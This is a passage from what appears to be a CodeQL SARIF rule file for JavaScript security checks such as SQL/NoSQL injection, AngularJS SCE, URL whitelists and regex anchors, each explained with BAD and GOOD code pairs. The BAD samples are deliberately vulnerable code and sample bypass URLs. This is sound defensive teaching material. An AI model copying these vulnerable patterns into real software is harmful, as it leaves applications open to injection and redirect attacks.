artifact can\n expose it to an attacker.", + "id" : "js/build-artifact-leak", + "kind" : "path-problem", + "name" : "Storage of sensitive information in build artifact", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/sql-injection", + "name" : "js/sql-injection", + "shortDescription" : { + "text" : "Database query built from user-controlled sources" + }, + "fullDescription" : { + "text" : "Building a database query from user-controlled sources is vulnerable to insertion of malicious code by the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n", + "markdown" : "# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-089", "external/cwe/cwe-090", "external/cwe/cwe-943" ], + "description" : "Building a database query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/sql-injection", + "kind" : "path-problem", + "name" : "Database query built from user-controlled sources", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/angular/disabling-sce", + "name" : "js/angular/disabling-sce", + "shortDescription" : { + "text" : "Disabling SCE" + }, + "fullDescription" : { + "text" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "maintainability", "frameworks/angularjs", "external/cwe/cwe-116" ], + "description" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities.", + "id" : "js/angular/disabling-sce", + "kind" : "problem", + "name" : "Disabling SCE", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/angular/double-compilation", + "name" : "js/angular/double-compilation", + "shortDescription" : { + "text" : "Double compilation" + }, + "fullDescription" : { + "text" : "Recompiling an already compiled part of the DOM can lead to unexpected behavior of directives, performance problems, and memory leaks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n", + "markdown" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n" + }, + "properties" : { + "tags" : [ "reliability", "frameworks/angularjs", "security", "external/cwe/cwe-1176" ], + "description" : "Recompiling an already compiled part of the DOM can lead to\n unexpected behavior of directives, performance problems, and memory leaks.", + "id" : "js/angular/double-compilation", + "kind" : "problem", + "name" : "Double compilation", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "8.8" + } + }, { + "id" : "js/angular/insecure-url-whitelist", + "name" : "js/angular/insecure-url-whitelist", + "shortDescription" : { + "text" : "Insecure URL whitelist" + }, + "fullDescription" : { + "text" : "URL whitelists that are too permissive can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n", + "markdown" : "# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/angularjs", "external/cwe/cwe-183", "external/cwe/cwe-625" ], + "description" : "URL whitelists that are too permissive can cause security vulnerabilities.", + "id" : "js/angular/insecure-url-whitelist", + "kind" : "problem", + "name" : "Insecure URL whitelist", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/identity-replacement", + "name" : "js/identity-replacement", + "shortDescription" : { + "text" : "Replacement of a substring with itself" + }, + "fullDescription" : { + "text" : "Replacing a substring with itself has no effect and may indicate a mistake." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-116" ], + "description" : "Replacing a substring with itself has no effect and may indicate a mistake.", + "id" : "js/identity-replacement", + "kind" : "problem", + "name" : "Replacement of a substring with itself", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/unsafe-external-link", + "name" : "js/unsafe-external-link", + "shortDescription" : { + "text" : "Potentially unsafe external link" + }, + "fullDescription" : { + "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", + "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" + }, + "properties" : { + "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], + "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", + "id" : "js/unsafe-external-link", + "kind" : "problem", + "name" : "Potentially unsafe external link", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/regex/missing-regexp-anchor", + "name" : "js/regex/missing-regexp-anchor", + "shortDescription" : { + "text" : "Missing regular expression anchor" + }, + "fullDescription" : { + "text" : "Regular expressions without anchors can be vulnerable to bypassing." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Regular expressions without anchors can be vulnerable to bypassing.", + "id" : "js/regex/missing-regexp-anchor", + "kind" : "problem", + "name" : "Missing regular expression anchor", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/missing-origin-check", + "name" : "js/missing-origin-check", + "shortDescription" : { + "text" : "Missing origin verification in `postMessage` handler" + }, + "fullDescription" : { + "text" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## 